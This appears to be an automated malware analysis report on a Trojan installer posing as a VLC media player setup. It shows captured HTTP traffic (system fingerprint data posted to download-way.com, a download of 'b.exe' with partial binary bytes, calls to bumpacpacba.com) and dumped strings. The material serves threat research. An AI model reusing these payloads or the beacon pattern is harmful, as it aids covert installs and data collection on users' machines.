l.Q.,....>..RJ.9.QG.9..G..h...;6QP.p.)..t..G..h..?.X.'7V..J<....8....>.$A.>..R.?.."..p.!D ~..G...b...h.B....AA0........ .,......#...~ D<.."H ....,..B.<....8..r."....7.Xc...|.K(#(..................nD.D ....8.(aK>.............

<<< skipped >>>

GET /file/cmu9yf4p HTTP/1.1

Accept: */*

User-Agent: Setup Factory 9.0

Host: uploaded.net

Connection: Keep-Alive

Cache-Control: no-cache

HTTP/1.1 302 Found

Server: nginx

Date: Thu, 10 Dec 2015 04:50:07 GMT

Content-Type: text/html

Content-Length: 0

Connection: keep-alive

Set-Cookie: PHPSESSID=d88cfbfbdb81d31ee23f60636b045023; path=/

Expires: Thu, 19 Nov 1981 08:52:00 GMT

Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0

Pragma: no-cache

Location: hXXp://fra-7m22-stor05.uploaded.net/dl/a310a9a0-108b-44cf-bccd-26cb6eec3d08

Vary: Accept-Encoding

HTTP/1.1 302 Found..Server: nginx..Date: Thu, 10 Dec 2015 04:50:07 GMT..Content-Type: text/html..Content-Length: 0..Connection: keep-alive..Set-Cookie: PHPSESSID=d88cfbfbdb81d31ee23f60636b045023; path=/..Expires: Thu, 19 Nov 1981 08:52:00 GMT..Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0..Pragma: no-cache..Location: hXXp://fra-7m22-stor05.uploaded.net/dl/a310a9a0-108b-44cf-bccd-26cb6eec3d08..Vary: Accept-Encoding..

GET /9ee1efd2-b9b2-403f-8f9a-5fc856fa00a3/cancel1.gif HTTP/1.1

Accept: */*

Referer: hXXp://VVV.download-way.com/index.php

Accept-Language: en-us

Accept-Encoding: gzip, deflate

User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)

Host: cdn2.downloadsoup.com

Connection: Keep-Alive

HTTP/1.1 200 OK

Content-Type: image/gif

Content-Length: 2881

Connection: keep-alive

Date: Thu, 10 Dec 2015 04:01:56 GMT

Content-Disposition: attachment; filename="cancel1.gif"

Last-Modified: Thu, 26 Feb 2015 16:19:15 GMT

ETag: "d9f00c86bfa3e08e905128b131229fac"

Accept-Ranges: bytes

Server: AmazonS3

Age: 2898

X-Cache: Hit from cloudfront

Via: 1.1 c013a1b33ae2677bcfa21234aa9a4276.cloudfront.net (CloudFront)

X-Amz-Cf-Id: 1xu-Tb0eahQbBrnmv2Hya2cf2FTzY-CyT1tuh8TZs_gM8s6rEt2W-A==

GIF89ae......@.H*.-<.AC.K=.F>.H'. ;.B,./=.E)./)..@.I=.D=.D?.GC.M>.DC.IC.K'.,@.H>.F:.A*./D.LC.M?.HB.L=.G;.A9.@:.C .-;.CuuuB.K(.)>.G)..<.C). @.I>.E...>.G,. ). &. <.E*.&%.*6.C-.3-.33.7).1&.)www(.-*. .../.54.?-.4=.B...!.().0...-.7...G.I..9-.35.7?.F'.0A.O-..,.5<.B>.J ..D.I5.:..5=.GE.K/.0-.-/.2?.=,.7*. ;.B/.4 .'C.I..79.B&.2 .,<.>".*-.0?.C-.-8.>-.&'.12.4:.AC.B1.7-.4..$'. 3.8Q.\<.A<.G4.9 .05.<C.F6.;;.I@.I".%;.B>.Q*.-0.5&.<9.?'.-#.) .6:.A ./..31.57.>4.96.>0.76.<&.)2.78.?-.2-.3ppp..................................................................................................................................................................................................................................................................................................................!..XMP DataXMP<?xpacket begin="..." id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 5.3-c011 66.145661, 2012/02/06-14:56:27 "> <rdf:RDF xmlns:rdf="hXXp://VVV.w3.org/1999/02/22-rdf-syntax-ns#"> <rdf:Description rdf:about="" xmlns:xmp="hXXp://ns.adobe.com/xap/1.0/" xmlns:xmpMM="hXXp://ns.adobe.com/xap/1.0/mm/" xmlns:stRef="hXXp://ns.adobe.com/xap/1.0/sType/ResourceRef#" xmp:CreatorTool="Adobe Photoshop CS6 (Windows)" xmpMM:InstanceID="xmp.iid:5653313B52CD11E48302D8AFAF09E831" xmpMM:DocumentID="xmp.did:5653313C52CD11E48302D8AFAF09E831"> <xmpMM:DerivedFrom stRef:instanceID="xmp.iid:5653313952CD11E48302D8AFAF

<<< skipped >>>

GET /9ee1efd2-b9b2-403f-8f9a-5fc856fa00a3/decline.gif HTTP/1.1

Accept: */*

Referer: hXXp://VVV.download-way.com/index.php

Accept-Language: en-us

Accept-Encoding: gzip, deflate

User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)

Host: cdn2.downloadsoup.com

Connection: Keep-Alive

HTTP/1.1 200 OK

Content-Type: image/gif

Content-Length: 1293

Connection: keep-alive

Date: Thu, 10 Dec 2015 04:01:58 GMT

Content-Disposition: attachment; filename="decline.gif"

Last-Modified: Thu, 26 Feb 2015 16:19:16 GMT

ETag: "137a96f0655570ffdf65ae14dad52404"

Accept-Ranges: bytes

Server: AmazonS3

Age: 2896

X-Cache: Hit from cloudfront

Via: 1.1 c013a1b33ae2677bcfa21234aa9a4276.cloudfront.net (CloudFront)

X-Amz-Cf-Id: 0kVL2SOnaBGzM82AJcrWkuDanxR0ra8f0cykqeuKfMoD75eZmEx2hQ==

GIF89ae......................................................................................................................................................................................................................................................................................................................................................................................................!.....t.,....e........ns.............n..mB.............FBm.s.C.............AB.DE.............DDI.GGF.............G.I.........(.....HJ.LML..........%....8...z.J.\..a.%N.5qB......8...F......H..F...$)..e.&P.A.I....37>......Ax..JT.N%D..\....)..H.J..U...H..u...[.... ..&/H.{!%.V.m...X0...)Se.......W.P!D.J.... ^.a@..T..(.........B.E....4.<Z4..-2..r....7L.....m*W.Y..........Nc...<.x..a.....Do..........;........{......_.>.. ..3(p....W._9p........{.........z... {[.....Vh...F0@..vX..Y.....D.E..v.!. f.".%j...#bh#._....[....@.)..@.1..[.....L2YD...I..C.X...H@..M2.D.`.....|...h....^.0@.pv.D..`...S.........o....z....7......9.!b.!...Vji. .... ....`<A'..f...T....=......:....0A.[$0@.>......{....a...&.....8@........a...&`...6.l.bP0....;n._. B...@.....l...a.......d......,....k......!h4....G....Wl.j..g....w.q.g.2..$.l..(....,....0..s.4..r......<....6.-t.?.m4.l.<G.o....PG-..TWM..M[...P....X...$d.m..g..@ .;....

<<< skipped >>>

GET /9ee1efd2-b9b2-403f-8f9a-5fc856fa00a3/accept.gif HTTP/1.1

Accept: */*

Referer: hXXp://VVV.download-way.com/index.php

Accept-Language: en-us

Accept-Encoding: gzip, deflate

User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)

Host: cdn2.downloadsoup.com

Connection: Keep-Alive

HTTP/1.1 200 OK

Content-Type: image/gif

Content-Length: 3033

Connection: keep-alive

Date: Thu, 10 Dec 2015 04:01:58 GMT

Content-Disposition: attachment; filename="accept.gif"

Last-Modified: Thu, 26 Feb 2015 16:19:15 GMT

ETag: "3484f982bbd281ea323f9dedb47098ed"

Accept-Ranges: bytes

Server: AmazonS3

Age: 2896

X-Cache: Hit from cloudfront

Via: 1.1 c013a1b33ae2677bcfa21234aa9a4276.cloudfront.net (CloudFront)

X-Amz-Cf-Id: LanaVVYEVn3lXNi5MFBKdcam9x24x111oxFaOberXB-tFe7IvO33vQ==

GIF89ae...............!.(:.AhxjC.M..%...C.E...?.G...gvh*. *./*.3guhwww?.H<.E>.E&.) .->.G;.Appp.....3-.3,./-.2*.-=.E@.H<.A)..@.IC.K'. =.D8.?:.A7.>6.<2.74.91.50.76.>..................C.K...}..o.t ./...............'.,^.d......L.R~..uuu...............J.N...<.C...H.KL.P..................[._&. ...........................|.~......(.-...4.?k.oB.KG.M?.G...[.^;.C...|.....y.}...a.f......;.B...Y.^...j.m.........I.M......?.B>.D............M.Q...........9<.?... .5o.s1.8(.,A.K......C.I%.*..2?.Hgug).1E.Kn.o@.I-.4E.I>.F=.D6.;...'.)*.(*./-.-?.=-..:.C../<.C...5.<=.B?.C...9.@9.A:.A,.2;.B;.BQ.\...O.Tkyl/.3\._8.>'.-/.2>.F?.P<.F*.&-.34.9(.,@.I .....)./=.D3.8&.<C.K#.*C.J .,~.. .&...#.&(.) .2,.3=.F,.5(./...{.}...=.E&.*Y.\-.39.B{.|.........hwi). iyjjzk-.2^.b>.J&.,q.ul.pm.pn.q...M.R......<.A......!..XMP DataXMP<?xpacket begin="..." id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 5.3-c011 66.145661, 2012/02/06-14:56:27 "> <rdf:RDF xmlns:rdf="hXXp://VVV.w3.org/1999/02/22-rdf-syntax-ns#"> <rdf:Description rdf:about="" xmlns:xmpMM="hXXp://ns.adobe.com/xap/1.0/mm/" xmlns:stRef="hXXp://ns.adobe.com/xap/1.0/sType/ResourceRef#" xmlns:xmp="hXXp://ns.adobe.com/xap/1.0/" xmpMM:OriginalDocumentID="xmp.did:325014833434E411B829A1185F1C216E" xmpMM:DocumentID="xmp.did:D165859F343611E4B378E2150F88781F" xmpMM:InstanceID="xmp.iid:D165859E343611E4B378E2150F88781F" xmp:CreatorTool="Adobe Photoshop CS6 (Windows)"> <xmpMM:Deriv

<<< skipped >>>

GET /9ee1efd2-b9b2-403f-8f9a-5fc856fa00a3/left_image.png HTTP/1.1

Accept: */*

Referer: hXXp://VVV.download-way.com/index.php

Accept-Language: en-us

Accept-Encoding: gzip, deflate

User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)

Host: cdn2.downloadsoup.com

Connection: Keep-Alive

HTTP/1.1 200 OK

Content-Type: image/png

Content-Length: 38013

Connection: keep-alive

Date: Wed, 09 Dec 2015 16:41:49 GMT

Content-Disposition: attachment; filename="left_image.png"

Last-Modified: Thu, 26 Feb 2015 16:19:16 GMT

ETag: "69024df30fda549f6ed20e0a65a7face"

Accept-Ranges: bytes

Server: AmazonS3

Age: 43706

X-Cache: Hit from cloudfront

Via: 1.1 c013a1b33ae2677bcfa21234aa9a4276.cloudfront.net (CloudFront)

X-Amz-Cf-Id: LBSU4KwL0l_MWmoVqRuvp8JV3C4H52Je9rOg2soOoU04syQnF7d68Q==

.PNG........IHDR.......e......89.....gAMA....7.......pHYs.......... ......tEXtSoftware.Adobe ImageReadyq.e<....IDATx^....l.U.v..........iF...Y.Vl....F.3..,.$.....8...@. .....l..A.6...I....d.1Y6..4...... #i.3.73..{.]..]U.....s......]..._.~........>{.........u&:...m...C.l.Ls.a6.[6L.{..8B...US1...~\}a.T....ye.....cx..U..u=c..l..B,...a.<(......./].b}!:9.Ee....N.........P~?..^.T...w.Y.......q.......Js......I..P.../...X........t.:.O.>M..q...fso.q3..6n$....].1.}}....,......4a}..i.q.]....p.D....w...$.CR.....(.v}.Q.;-8..#.v.........9W...>..0}...ar.%........T*..;n}..~...G_.h..z...h.S.5..ad;6..X.fO.>...L?..s......I.g)......e...g.,.N..F.P.d......L..b.....~..1,...PB.='.w...$....7.g67&.....U.m>..Z.1L....../...3....j.....b)k..v....8.{e.....D\..<..w...$..TV..U..1#VG:..F..a...FZ..:.\....J.|s..\1[....R...r.).T.7).g.|.>.o..1.p.7..!..TW...k...e..f. ./.O..k6Pfk....SH..G..,.....{.\......?....3.O....e.......c.2.?.w .)..r........,...qe`\_..[.a..i.TW.....=.L...yP\:.3q\......lX1.3.:....L.%...g.H?...6..|}....K([.E.SP..@...9....2..nn}..S~. *.......Fc..[..BE..V.....fq.Q..7.......}:d}...(...D.h(.U.:.e..iZ.././hP\:,.....-.|}.....}.-...<.@...*v......=..t ....|<.9<..0}.,a.t.B..z}.;..,.w..4..D2j\.&.bc...(V1!..,a...4......c....R5....M........66........j.,&...o...I...Vx..7...'...O...R[|s...........`...$:L....c-....Fh...Yo})..r.O.\.p......>..O.....x@K9H....a\...V...b{.{..J.....vk..0]7.)3..!.......!...D. ....7...6j.=..O..s..bZ.[6............k.p.7....FX.....q..Y..Q.l\:l...V..a.....<.}.y2.1..p*;.....Y..q'..{.

<<< skipped >>>

GET /V31/amipb.js HTTP/1.1

Accept: */*

Referer: hXXp://VVV.download-way.com/index.php

Accept-Language: en-us

Accept-Encoding: gzip, deflate

User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)

Host: cdn1.downloadsoup.com

Connection: Keep-Alive

HTTP/1.1 200 OK

Content-Type: application/x-javascript

Content-Length: 69260

Connection: keep-alive

Date: Thu, 10 Dec 2015 04:00:05 GMT

Last-Modified: Thu, 26 Nov 2015 15:03:49 GMT

ETag: "f96a7acecd2cfb0d4f3cfca235763504"

x-amz-storage-class: REDUCED_REDUNDANCY

Accept-Ranges: bytes

Server: AmazonS3

Age: 3009

X-Cache: Hit from cloudfront

Via: 1.1 8bed981585e2338012e4dd37a06b0cdb.cloudfront.net (CloudFront)

X-Amz-Cf-Id: 76rLksTr2aHXgtjcgEIqqSLYx8FbPDNzqvKkh14XRZ4mmm5ypuNJNA==

..//<!-- ../* Progress bar */..var g_AmiPbs = new Array();..var g_AmiPbsEx = new Array();..var g_interval = 0;..var g_initComp = 0;..var g_possibleComps = [];..var g_reportedComps = [];..var g_removedComps = [];..var g_notCompatibleWithUpdaterComps = ['LootFindKP'];..var g_postponedComps = ['updater','SHAREit'];..var g_disable_updater = false;..function LogMessage(message) {.. try {.. g_ami.Log(message);.. }.. catch (excpt) {.. }..}..function IsDeclined(name) {.. var declined = 0;.. for (var i = 0; i < g_removedComps.length; i ) {.. if (g_removedComps[i] == name) {.. declined = 1;.. break;.. }.. }.. return declined;..}..function UpdateSkipStatus(sn) {.. if (g_testa && !ArrayContains(g_reportedComps, sn) && !ArrayContains(g_notest, sn) && !ArrayContains(g_notest1, sn)) {.. if (g_testa.constructor != Array || ArrayContains(g_testa, sn)) {.. g_ami.WriteProfileString(g_testf, '', sn, 'S');.. g_reportedComps.push(sn);.. }.. }..}..function ShortNameFromName(name) {.. for (c = 0; c < g_comps.length; c ) {.. if (g_comps[c].name == name) {.. return g_comps[c].sn;.. }.. }.. return name;..}..function UpdateComponentsStatus() {.. LogMessage('UpdateComponentsStatus function started');.. for (var j = 0; j < g_possibleComps.length; j ) {.. if (g_possibleComps[j].sn == 'updater') {.. continue;.. }.. if (g_possibleComps[j].sel !==

<<< skipped >>>

GET /cmu9yf4p HTTP/1.1

Accept: */*

Content-Type: application/x-www-form-urlencoded

User-Agent: Setup Factory 9.0

Host: ul.to

Connection: Keep-Alive

Cache-Control: no-cache

HTTP/1.1 302 Found

Server: nginx

Date: Thu, 10 Dec 2015 04:50:07 GMT

Content-Type: text/html

Content-Length: 0

Connection: keep-alive

Location: hXXp://uploaded.net/file/cmu9yf4p

Vary: Accept-Encoding

HTTP/1.1 302 Found..Server: nginx..Date: Thu, 10 Dec 2015 04:50:07 GMT..Content-Type: text/html..Content-Length: 0..Connection: keep-alive..Location: hXXp://uploaded.net/file/cmu9yf4p..Vary: Accept-Encoding..

POST /index.php HTTP/1.1

Accept: */*

Accept-Language: en-us

Content-Type: application/x-www-form-urlencoded

Accept-Encoding: gzip, deflate

User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)

Host: VVV.download-way.com

Content-Length: 448

Connection: Keep-Alive

Cache-Control: no-cache

Net1.1=&Net2=3.5.21022.08&Net4=4.0.30319&OSversion=NT5.1SP3&Slv=&Sysid=975F29BE8C8FD0BC5E8EBA2BBF1B629F&Sysid1=975F29BE8C8FD0BC5E8EBA2BBF1B629F&X64=N&admin=Y&browser=IEXPLORE.EXE&cavp=&chver=&cmdl=MediaPlayer__15159_il35679.exe&dprod=19C2FB3DEC385401F6FCF22178334A&exe=MediaPlayer__15159_il35679&ffver=&lang_DfltUser=0409&mac=AA==&machg=NzVlZDk1NjctYWE1OC00YzhlLWE4ZWEtM2NhZDdjNDdhYjAzAA==&name=WFAxMAA=&netfs=3&ts=1449723017&ver=1.1.5.55

HTTP/1.1 200 OK

Access-Control-Allow-Origin: hXXp://VVV.somauto.com

Content-Type: text/html; charset=UTF-8

Date: Thu, 10 Dec 2015 04:50:12 GMT

Server: Apache/2.2.15 (Red Hat)

X-Powered-By: PHP/5.3.3

transfer-encoding: chunked

Connection: keep-alive

21f1.... .. ..<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">.<html>. <head>. <meta http-equiv="content-type" content="text/html; charset=UTF-8" /> . <title>MediaPlayer</title>. <base href="http://VVV.download-way.com:80/index.php" />.<link rel="stylesheet" type="text/css" href="hXXp://cdn2.downloadsoup.com/9ee1efd2-b9b2-403f-8f9a-5fc856fa00a3/main.css" /> <script type="text/javascript" src="hXXp://cdn1.downloadsoup.com/V31/amipb.js"></script>. <script type="text/javascript">.var g_r__capp='MediaPlayer';.. var g_amiobj = '', g_ami, g_updb = false, g_close = '1', g_additional_offer_list = '1';. var g_finish_install_button = '1';. var g_popup_install_all = '1';. var g_eula = 'QnkgY2xpY2tpbmcgdGhlICJBY2NlcHQiIG9yICJOZXh0IiBidXR0b25zIGJlbG93LCBvciBieSBjb250aW51aW5nIHRoaXMgSW5zdGFsbFBhdGggSW5zdGFsbCBNYW5hZ2VyIGluc3RhbGxhdGlvbiwgb3Igb3RoZXJ3aXNlIHVzaW5nIHRoZSBTb2Z0d2FyZSwgeW91IGFncmVlIHRvIGJlIGJvdW5kIGJ5IHRoZSB0ZXJtcyBvZiBJbnN0YWxsUGF0aCBJbnN0YWxsIE1hbmFnZXIgaHR0cDovL3d3dy5pbnN0YWxscGF0aC5jb20vZXVsYS5odG1sIChFVUxBKSwgaXRzIGh0dHA6Ly93d3cuaW5zdGFsbHBhdGguY29tL3ByaXZhY3kuaHRtbCAoUHJpdmFjeSBQb2xpY3kpIGFuZCBodHRwOi8vd3d3Lmluc3RhbGxwYXRoLmNvbS90ZXJtcy5odG1sIChUZXJtcyBvZiBTZXJ2aWNlKS4gRm9yIGFueSBhZGRpdGlvbmFsIGluZm9ybWF0aW9uIG9uIEluc3RhbGxQYXRoIEluc3RhbGwgTWFuYWdlciB5b3UgY2FuIHZpc2l0IEluc3RhbGxQYXRoJ3Mgd2Vic2l0ZSBhdCBodHRwOi8vd3d3Lmluc3RhbGxwYXRoLmNvbS8

<<< skipped >>>

POST /finalize.php HTTP/1.1

Accept: */*

Accept-Language: en-us

Referer: hXXp://VVV.download-way.com/index.php

Content-Type: application/x-www-form-urlencoded

Accept-Encoding: gzip, deflate

User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)

Host: VVV.download-way.com

Content-Length: 381

Connection: Keep-Alive

Cache-Control: no-cache

_hdn=0&_ver=1.1.5.55&_p=1&_s=20&_cc=UA&_cid=15159&_psb=0&_cnt=77cf2e0adca2896b80870fc402dc2b9b&_instid=l35679&_brw=ie&_fc=216&_appname=&_appimageurl=&_netfs=-31&_vert=3&r_MediaPlayer=0&r_updater=0.01&r_NationZoom=1&r_OperaRUnew=2&r_AmigoIM=5&r_AnySend=1&r_OperaWW=2&r_PPSvideoPlayer=1&MediaPlayer=3&updater=2&NationZoom=1&OperaRUnew=1&AmigoIM=1&AnySend=1&OperaWW=1&PPSvideoPlayer=1

HTTP/1.1 200 OK

Content-Type: text/xml

Date: Thu, 10 Dec 2015 04:50:13 GMT

Server: Apache/2.2.15 (Red Hat)

X-Powered-By: PHP/5.3.3

Content-Length: 3285

Connection: keep-alive

....<Array><page><f>1</f><fb>9</fb><pt>0</pt><cats>0</cats><updh>1</updh><wrn></wrn><comps>MediaPlayer</comps><short_name>MediaPlayer</short_name><must_show>0</must_show><bdy>CiAgICAgICAgCjxkaXYgaWQ9ImFtaV9kaXNwbGF5X2JvZHkiPgoJPGRpdiBpZD0iYW1pX2xlZnRfaW1hZ2UiPgkKCQk8ZGl2IGlkPSJhbWlfbGVmdF9saW5rcyI CgkJCTxhIGhyZWY9Imh0dHA6Ly93d3cuaW5zdGFsbHBhdGguY29tL3ByaXZhY3kuaHRtbCAiIHRhcmdldD0iX2JsYW5rIiBzdHlsZT0iY29sb3I6IHdoaXRlIj5Qcml2YWN5IFBvbGljeTwvYT48YnIgLz4KCQkJPGEgaHJlZj0iaHR0cDovL3d3dy5pbnN0YWxscGF0aC5jb20vaW5kZXguaHRtbCIgdGFyZ2V0PSJfYmxhbmsiIHN0eWxlPSJjb2xvcjogd2hpdGUiPkhlbHA8L2E PGJyIC8 CgkJCTxhIGhyZWY9Imh0dHA6Ly93d3cuaW5zdGFsbHBhdGguY29tL2NvbnRhY3QtdXMuaHRtbCIgdGFyZ2V0PSJfYmxhbmsiIHN0eWxlPSJjb2xvcjogd2hpdGUiPkNvbnRhY3QgdXM8L2E CgkJPC9kaXY Cgk8L2Rpdj4KCTxkaXYgaWQ9ImFtaV9ib2R5X3RleHQiPgoJCTxkaXYgaWQ9ImFtaV9kZWNfZGl2Ij4JCgkJCTxzcGFuIGlkPSJhbWlfZGVjX3RpdGxlIj5XZWxjb21lIHRvIHRoZSBWTEMgTWVkaWEgUGxheWVyIFNldHVwIFdpemFyZDwvc3Bhbj4KCQkJPHAgaWQ9ImFtaV9kZWNfaW5mbyI CgkJCSAgRm9sbG93IHRoZSBvbi1zY3JlZW4gb3V0bGluZWQgdGhpcyB3aXphcmQgdG8gaW5zdGFsbCB0aGUgbmV3IHZlcnNpb24gb2YgVkxDIE1lZGlhIFBsYXllcgoJCQkgIGFuZCBiZW5lZml0IGZyb20gYWxsIHRoZSBsYXRlc3QgZmVhdHVyZXMgYW5kIHVwZGF0ZXMgVkxDIE1lZGlhIFBsYXllciBoYXMgdG8gb2ZmZXIuCgkJCTwvcD4KCQkgIDxzcGFuIGlkPSJhbWlfZGVjX25vdGUiPlBsZWFzZSB0byBjb250aW51ZSB3aXRoIHRoZSBpbnN0YWxsYXRpb24gc2VsZWN0IHlvdXIgZGVzaXJlZCBvcHRpb246PC9zcGFuPgoJCTwvZGl2PgoJCQkJCgkJPGRpdiBpZD0iZF9hbWlfTWVkaWF

<<< skipped >>>

GET /dl/a310a9a0-108b-44cf-bccd-26cb6eec3d08 HTTP/1.1

Accept: */*

Host: fra-7m22-stor05.uploaded.net

User-Agent: Setup Factory 9.0

Cookie: PHPSESSID=d88cfbfbdb81d31ee23f60636b045023

Connection: Keep-Alive

Cache-Control: no-cache

HTTP/1.1 200 OK

Server: nginx

Date: Thu, 10 Dec 2015 04:50:07 GMT

Content-Type: application/octet-stream

Content-Length: 2861977

Last-Modified: Wed, 09 Dec 2015 20:37:36 GMT

Connection: keep-alive

Content-Disposition: attachment; filename="b.exe"

ETag: "56689110-2bab99"

Accept-Ranges: bytes

MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........2...\...\...\..'....\..'....\.......\...]...\..'....\..'....\..'....\.Rich..\.........PE..L...,-.T.................X...........).......p....@..........................P......J6....@.................................<...d........n...................0..........................................@............p..x............................text....W.......X.................. ..`.rdata.......p...0...\..............@..@.data...h...........................@....rsrc....n.......p..................@..@.reloc.......0......................@..B........................................................................................................................................................................................................................................................................................................................................................................U...X......... .@.3..E.SVW.}.3.h....S....@...dq@.P..hq@........`........V......SP.......Pp@....W..;.}.W......P...p@.3.h..........WP..............9=..@.......3.F...@..4.......P...p@......./ub......<Tt"<Wt.<tt.<wuL......P.....u>.......6......P.....~(......:u....~....P......P......P........j.h.q@.j.......PVj....p@....u..5..@.G;=..@...O.................F...1w........u.j.h.q@.......Pj...lq@........u....M._..^3.[.........V..W3.h..........WP...q@...0.....8.....<.....@.....D....A..............H

<<< skipped >>>

GET /down/kabo/apps.php HTTP/1.1

Accept: */*

Content-Type: application/x-www-form-urlencoded

User-Agent: Setup Factory 9.0

Host: bumpacpacba.com

Connection: Keep-Alive

Cache-Control: no-cache

HTTP/1.1 200 OK

X-Powered-By: PHP/5.4.45

Content-Type: text/html

Content-Length: 32

Date: Thu, 10 Dec 2015 04:50:04 GMT

Accept-Ranges: bytes

Server: LiteSpeed

Connection: close

EDkh679oKhVnvEc2tJ4F2hCvvh3Af0tl..

Map

The Trojan connects to the servers at the folowing location(s):

Strings from Dumps

MediaPlayer__15159_il35679.exe_1884:

.text

.text

`.rdata

`.rdata

@.data

@.data

.rsrc

.rsrc

@.reloc

@.reloc

109 9 59

109 9 59

17 85 54 84 79 51 17 115

17 85 54 84 79 51 17 115

19 89 52 85 120 58 58 67 63

19 89 52 85 120 58 58 67 63

18 116 19 2 9 120 49 92 54

18 116 19 2 9 120 49 92 54

18 121 28

18 121 28

18 85 46 117 120

18 85 46 117 120

18 85 46 97 82 46 48 92

18 85 46 97 82 46 48 92

25 95 59 85 114 53 58 94 27

25 95 59 85 114 53 58 94 27

25 95 59 85 114 53 58 94 13

25 95 59 85 114 53 58 94 13

59 68 62 93 87 120 49 92 54

59 68 62 93 87 120 49 92 54

59 67 54 94 84 61 32 64

59 67 54 94 84 61 32 64

58 92 63 2 9 120 49 92 54

58 92 63 2 9 120 49 92 54

7 85 59 85 125 63 57 85

7 85 59 85 125 63 57 85

7 85 54 84 90 37 48 116 25

7 85 54 84 90 37 48 116 25

38 66 44

38 66 44

0 99 31 99 8 100 123 84 54 93

0 99 31 99 8 100 123 84 54 93

2 66 51 69 94 16 60 92 63

2 66 51 69 94 16 60 92 63

34 66 49 66 79

34 66 49 66 79

GetProcessWindowStation

GetProcessWindowStation

operator

operator

KERNEL32.dll

KERNEL32.dll

USER32.dll

USER32.dll

ole32.dll

ole32.dll

RegCloseKey

RegCloseKey

RegOpenKeyW

RegOpenKeyW

ADVAPI32.dll

ADVAPI32.dll

GetProcessHeap

GetProcessHeap

GetCPInfo

GetCPInfo

0NÙ2n:

0NÙ2n:

~S%uga

~S%uga

{.OC]]

{.OC]]

5q.DW

5q.DW

9N%uE

9N%uE

~S%ua

~S%ua

3.kj=

3.kj=

s'.kC

s'.kC

#^.BA

#^.BA

}`.GQ

}`.GQ

~BL

~BL

.AweI

.AweI

bNzg .Gf?

bNzg .Gf?

%9sfkh,A

%9sfkh,A

%9sfkh,_

%9sfkh,_

U.ji'

U.ji'

%ssP{

%ssP{

%SI8{n

%SI8{n

yp{.nf

yp{.nf

K.kXhgw?j6ww

K.kXhgw?j6ww

0>.Aq

0>.Aq

.GQ

.GQ

C%uv(R

C%uv(R

l.OC0

l.OC0

II.sf

II.sf

Q_.zhA

Q_.zhA

%Sx\h

%Sx\h

E%x$M

E%x$M

F%xlN

F%xlN

%UeAW

%UeAW

.GVTL(

.GVTL(

7Z.Es&X

7Z.Es&X

G.Se(

G.Se(

.kbE D~*Z$

.kbE D~*Z$

RM%Cq

RM%Cq

..HaM

..HaM

%X%hbM

%X%hbM

.CQ}k

.CQ}k

e^/%d&

e^/%d&

~0.ad$

~0.ad$

}~2^4_

}~2^4_

%UuL*

%UuL*

.hp%(

.hp%(

-mSQl

-mSQl

type="win32" name="Microsoft.Windows.Common-Controls" version="6.0.0.0" processorArchitecture="*" publicKeyToken="6595b64144ccf1df" language="*" />

type="win32" name="Microsoft.Windows.Common-Controls" version="6.0.0.0" processorArchitecture="*" publicKeyToken="6595b64144ccf1df" language="*" />

103 60 97

103 60 97

109 37 20

109 37 20

112 59 96

112 59 96

116 44 119 94 116 115 98

116 44 119 94 116 115 98

26 1 94 107 93 86 73 23

26 1 94 107 93 86 73 23

116 12 87 126 116 83 66

116 12 87 126 116 83 66

119 52 113 94

119 52 113 94

@mscoree.dll

@mscoree.dll

- CRT not initialized

- CRT not initialized

- Attempt to initialize the CRT more than once.

- Attempt to initialize the CRT more than once.

- floating point support not loaded

- floating point support not loaded

kernel32.dll

kernel32.dll

USER32.DLL

USER32.DLL

C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\MediaPlayer__15159_il35679.exe

C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\MediaPlayer__15159_il35679.exe

MediaPlayer__15159_il35679.exe_1884_rwx_00B20000_0008C000:

.text

.text

`.rdata

`.rdata

@.data

@.data

.rsrc

.rsrc

@.reloc

@.reloc

j5SSh

j5SSh

8%uEP3

8%uEP3

PSShd'

PSShd'

xSSSh

xSSSh

FTPjKS

FTPjKS

FtPj;S

FtPj;S

C.PjRV

C.PjRV

Visual C CRT: Not enough memory to complete call to strerror.

Visual C CRT: Not enough memory to complete call to strerror.

Broken pipe

Broken pipe

Inappropriate I/O control operation

Inappropriate I/O control operation

Operation not permitted

Operation not permitted

portuguese-brazilian

portuguese-brazilian

operator

operator

GetProcessWindowStation

GetProcessWindowStation

WinHttpSetStatusCallback

WinHttpSetStatusCallback

Failed to get the Temp folder: %d

Failed to get the Temp folder: %d

RegOpenKeyTransactedW

RegOpenKeyTransactedW

RegCreateKeyTransactedW

RegCreateKeyTransactedW

RegDeleteKeyTransactedW

RegDeleteKeyTransactedW

RegDeleteKeyExW

RegDeleteKeyExW

2Ub46wAG7ILlcuNK7PAECPiT5WjjR/rwABTCpMxN Ezw6yEC7JTQUOR12 cHC/GV3E3Wevb6Gwu odZT7kzs7A==

